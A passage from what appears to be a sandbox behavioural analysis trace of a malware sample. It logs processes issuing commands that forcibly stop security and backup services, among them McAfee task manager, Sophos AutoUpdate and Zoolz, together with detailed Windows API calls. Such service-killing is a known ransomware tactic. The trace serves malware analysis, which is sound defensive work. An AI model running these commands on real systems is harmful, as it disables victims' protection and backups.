(hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x1b [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6㼸|6") returned 0xbe [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0037.968] LocalFree (hMem=0x7c9828) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6頨|6") returned 0x33 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6㼸|6") returned 0xc1 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0037.968] LocalFree (hMem=0x7c9828) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6頨|6") returned 0x16 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x33 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6㼸|6") returned 0x234 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0037.969] LocalFree (hMem=0x7c9828) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6頨|6") returned 0x13 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x16 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㵐|⡋瓢6㼸|6") returned 0x11 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3d50) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㵐|6") returned 0x14 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x12 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0xf [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x17 [0037.969] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.969] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.969] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x18 [0037.970] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0037.970] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.970] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x2a [0037.970] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0037.970] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.970] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.970] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0037.970] GetFileType (hFile=0x26c) returned 0x3 [0037.970] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x36f508 | out: lpMode=0x36f508) returned 0 [0037.970] GetConsoleOutputCP () returned 0x1b5 [0037.970] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0037.970] malloc (_Size=0x16) returned 0x162710 [0037.970] GetConsoleOutputCP () returned 0x1b5 [0037.970] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x162710, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0037.970] WriteFile (in: hFile=0x26c, lpBuffer=0x162710*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x36f50c, lpOverlapped=0x0 | out: lpBuffer=0x162710*, lpNumberOfBytesWritten=0x36f50c*=0x15, lpOverlapped=0x0) returned 1 [0037.970] free (_Block=0x162710) [0037.970] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.971] NetApiBufferFree (Buffer=0x7c1c80) returned 0x0 [0037.971] NetApiBufferFree (Buffer=0x7c1c98) returned 0x0 [0037.971] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y" [0037.971] exit (_Code=1) Process: id = "27" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a019000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0xb88 Process: id = "28" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x49a26000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xb84" cmd_line = "C:\\Windows\\system32\\net1 stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 96 os_tid = 0xb90 [0038.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfecc | out: lpSystemTimeAsFileTime=0x1bfecc*(dwLowDateTime=0xe0ecdf20, dwHighDateTime=0x1d57a86)) [0038.118] GetCurrentProcessId () returned 0xb8c [0038.118] GetCurrentThreadId () returned 0xb90 [0038.118] GetTickCount () returned 0x11448a5 [0038.118] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfec4 | out: lpPerformanceCount=0x1bfec4*=15840278168) returned 1 [0038.118] GetModuleHandleA (lpModuleName=0x0) returned 0xa70000 [0038.118] __set_app_type (_Type=0x1) [0038.118] __p__fmode () returned 0x74eb31f4 [0038.118] __p__commode () returned 0x74eb31fc [0038.119] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa7ffe6) returned 0x0 [0038.119] __getmainargs (in: _Argc=0xa89064, _Argv=0xa8906c, _Env=0xa89068, _DoWildCard=0, _StartInfo=0xa89024 | out: _Argc=0xa89064, _Argv=0xa8906c, _Env=0xa89068) returned 0 [0038.119] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.119] GetConsoleOutputCP () returned 0x1b5 [0038.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa89080 | out: lpCPInfo=0xa89080) returned 1 [0038.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.124] sprintf_s (in: _DstBuf=0x1bfe84, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0038.124] setlocale (category=0, locale=".437") returned="English_United States.437" [0038.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0038.126] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0038.126] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0038.126] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfc50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0038.126] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x6e) returned 0x333c10 [0038.127] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0038.127] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfe54 | out: Buffer=0x1bfe54*=0x331c70) returned 0x0 [0038.127] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfe54 | out: Buffer=0x1bfe54*=0x331c88) returned 0x0 [0038.127] _fileno (_File=0x74eb2900) returned -2 [0038.127] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0038.127] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0038.127] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0038.127] _wcsicmp (_String1="config", _String2="stop") returned -16 [0038.127] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0038.127] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0038.127] _wcsicmp (_String1="file", _String2="stop") returned -13 [0038.127] _wcsicmp (_String1="files", _String2="stop") returned -13 [0038.127] _wcsicmp (_String1="group", _String2="stop") returned -12 [0038.127] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0038.127] _wcsicmp (_String1="help", _String2="stop") returned -11 [0038.127] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0038.127] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0038.127] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0038.127] _wcsicmp (_String1="session", _String2="stop") returned -15 [0038.127] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0038.127] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0038.127] _wcsicmp (_String1="share", _String2="stop") returned -12 [0038.127] _wcsicmp (_String1="start", _String2="stop") returned -14 [0038.127] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0038.127] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0038.127] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0038.128] _wcsicmp (_String1="accounts", _String2="McTaskManager") returned -12 [0038.128] _wcsicmp (_String1="computer", _String2="McTaskManager") returned -10 [0038.128] _wcsicmp (_String1="config", _String2="McTaskManager") returned -10 [0038.128] _wcsicmp (_String1="continue", _String2="McTaskManager") returned -10 [0038.128] _wcsicmp (_String1="cont", _String2="McTaskManager") returned -10 [0038.128] _wcsicmp (_String1="file", _String2="McTaskManager") returned -7 [0038.128] _wcsicmp (_String1="files", _String2="McTaskManager") returned -7 [0038.128] _wcsicmp (_String1="group", _String2="McTaskManager") returned -6 [0038.128] _wcsicmp (_String1="groups", _String2="McTaskManager") returned -6 [0038.128] _wcsicmp (_String1="help", _String2="McTaskManager") returned -5 [0038.128] _wcsicmp (_String1="helpmsg", _String2="McTaskManager") returned -5 [0038.128] _wcsicmp (_String1="localgroup", _String2="McTaskManager") returned -1 [0038.128] _wcsicmp (_String1="pause", _String2="McTaskManager") returned 3 [0038.128] _wcsicmp (_String1="session", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="sessions", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="sess", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="share", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="start", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="stats", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="statistics", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="stop", _String2="McTaskManager") returned 6 [0038.128] _wcsicmp (_String1="time", _String2="McTaskManager") returned 7 [0038.128] _wcsicmp (_String1="user", _String2="McTaskManager") returned 8 [0038.128] _wcsicmp (_String1="users", _String2="McTaskManager") returned 8 [0038.128] _wcsicmp (_String1="msg", _String2="McTaskManager") returned 16 [0038.128] _wcsicmp (_String1="messenger", _String2="McTaskManager") returned 2 [0038.128] _wcsicmp (_String1="receiver", _String2="McTaskManager") returned 5 [0038.128] _wcsicmp (_String1="rcv", _String2="McTaskManager") returned 5 [0038.128] _wcsicmp (_String1="netpopup", _String2="McTaskManager") returned 1 [0038.128] _wcsicmp (_String1="redirector", _String2="McTaskManager") returned 5 [0038.128] _wcsicmp (_String1="redir", _String2="McTaskManager") returned 5 [0038.128] _wcsicmp (_String1="rdr", _String2="McTaskManager") returned 5 [0038.128] _wcsicmp (_String1="workstation", _String2="McTaskManager") returned 10 [0038.128] _wcsicmp (_String1="work", _String2="McTaskManager") returned 10 [0038.129] _wcsicmp (_String1="wksta", _String2="McTaskManager") returned 10 [0038.129] _wcsicmp (_String1="prdr", _String2="McTaskManager") returned 3 [0038.129] _wcsicmp (_String1="devrdr", _String2="McTaskManager") returned -9 [0038.129] _wcsicmp (_String1="lanmanworkstation", _String2="McTaskManager") returned -1 [0038.129] _wcsicmp (_String1="server", _String2="McTaskManager") returned 6 [0038.129] _wcsicmp (_String1="svr", _String2="McTaskManager") returned 6 [0038.129] _wcsicmp (_String1="srv", _String2="McTaskManager") returned 6 [0038.129] _wcsicmp (_String1="lanmanserver", _String2="McTaskManager") returned -1 [0038.129] _wcsicmp (_String1="alerter", _String2="McTaskManager") returned -12 [0038.129] _wcsicmp (_String1="netlogon", _String2="McTaskManager") returned 1 [0038.129] _wcsupr (in: _String="McTaskManager" | out: _String="MCTASKMANAGER") returned="MCTASKMANAGER" [0038.129] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3354d0 [0038.132] GetServiceKeyNameW (in: hSCManager=0x3354d0, lpDisplayName="MCTASKMANAGER", lpServiceName=0xa8aaf0, lpcchBuffer=0x1bfdf0 | out: lpServiceName="", lpcchBuffer=0x1bfdf0) returned 0 [0038.132] _wcsicmp (_String1="msg", _String2="MCTASKMANAGER") returned 16 [0038.132] _wcsicmp (_String1="messenger", _String2="MCTASKMANAGER") returned 2 [0038.132] _wcsicmp (_String1="receiver", _String2="MCTASKMANAGER") returned 5 [0038.132] _wcsicmp (_String1="rcv", _String2="MCTASKMANAGER") returned 5 [0038.132] _wcsicmp (_String1="redirector", _String2="MCTASKMANAGER") returned 5 [0038.132] _wcsicmp (_String1="redir", _String2="MCTASKMANAGER") returned 5 [0038.132] _wcsicmp (_String1="rdr", _String2="MCTASKMANAGER") returned 5 [0038.132] _wcsicmp (_String1="workstation", _String2="MCTASKMANAGER") returned 10 [0038.132] _wcsicmp (_String1="work", _String2="MCTASKMANAGER") returned 10 [0038.132] _wcsicmp (_String1="wksta", _String2="MCTASKMANAGER") returned 10 [0038.132] _wcsicmp (_String1="prdr", _String2="MCTASKMANAGER") returned 3 [0038.132] _wcsicmp (_String1="devrdr", _String2="MCTASKMANAGER") returned -9 [0038.132] _wcsicmp (_String1="lanmanworkstation", _String2="MCTASKMANAGER") returned -1 [0038.132] _wcsicmp (_String1="server", _String2="MCTASKMANAGER") returned 6 [0038.133] _wcsicmp (_String1="svr", _String2="MCTASKMANAGER") returned 6 [0038.133] _wcsicmp (_String1="srv", _String2="MCTASKMANAGER") returned 6 [0038.133] _wcsicmp (_String1="lanmanserver", _String2="MCTASKMANAGER") returned -1 [0038.133] _wcsicmp (_String1="alerter", _String2="MCTASKMANAGER") returned -12 [0038.133] _wcsicmp (_String1="netlogon", _String2="MCTASKMANAGER") returned 1 [0038.133] NetServiceControl (in: servername=0x0, service="MCTASKMANAGER", opcode=0x0, arg=0x0, bufptr=0x1bfdec | out: bufptr=0x1bfdec) returned 0x889 [0038.133] wcscpy_s (in: _Destination=0xa8a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0038.133] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0038.134] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa8b338, nSize=0x800, Arguments=0xa89dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0038.135] GetFileType (hFile=0x26c) returned 0x3 [0038.135] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x334000 [0038.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x334000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0038.135] WriteFile (in: hFile=0x26c, lpBuffer=0x334000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfd2c, lpOverlapped=0x0 | out: lpBuffer=0x334000*, lpNumberOfBytesWritten=0x1bfd2c*=0x1e, lpOverlapped=0x0) returned 1 [0038.135] LocalFree (hMem=0x334000) returned 0x0 [0038.135] GetFileType (hFile=0x26c) returned 0x3 [0038.135] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3362a8 [0038.136] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n3", lpUsedDefaultChar=0x0) returned 2 [0038.136] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfd2c, lpOverlapped=0x0 | out: lpBuffer=0x3362a8*, lpNumberOfBytesWritten=0x1bfd2c*=0x2, lpOverlapped=0x0) returned 1 [0038.136] LocalFree (hMem=0x3362a8) returned 0x0 [0038.136] _ultow (in: _Dest=0x889, _Radix=1834332 | out: _Dest=0x889) returned="2185" [0038.136] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa8b338, nSize=0x800, Arguments=0xa89dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0038.136] GetFileType (hFile=0x26c) returned 0x3 [0038.136] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3362a8 [0038.136] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3362a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0038.136] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfd38, lpOverlapped=0x0 | out: lpBuffer=0x3362a8*, lpNumberOfBytesWritten=0x1bfd38*=0x34, lpOverlapped=0x0) returned 1 [0038.136] LocalFree (hMem=0x3362a8) returned 0x0 [0038.136] GetFileType (hFile=0x26c) returned 0x3 [0038.136] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3362a8 [0038.136] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n3", lpUsedDefaultChar=0x0) returned 2 [0038.136] WriteFile (in: hFile=0x26c, lpBuffer=0x3362a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfd38, lpOverlapped=0x0 | out: lpBuffer=0x3362a8*, lpNumberOfBytesWritten=0x1bfd38*=0x2, lpOverlapped=0x0) returned 1 [0038.136] LocalFree (hMem=0x3362a8) returned 0x0 [0038.137] NetApiBufferFree (Buffer=0x331c70) returned 0x0 [0038.137] NetApiBufferFree (Buffer=0x331c88) returned 0x0 [0038.137] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0038.137] exit (_Code=2) Process: id = "29" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4991e000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 97 os_tid = 0xb98 Process: id = "30" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x494fc000" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0xb94" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0xba0 [0038.308] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34fd48 | out: lpSystemTimeAsFileTime=0x34fd48*(dwLowDateTime=0xe1096fa0, dwHighDateTime=0x1d57a86)) [0038.308] GetCurrentProcessId () returned 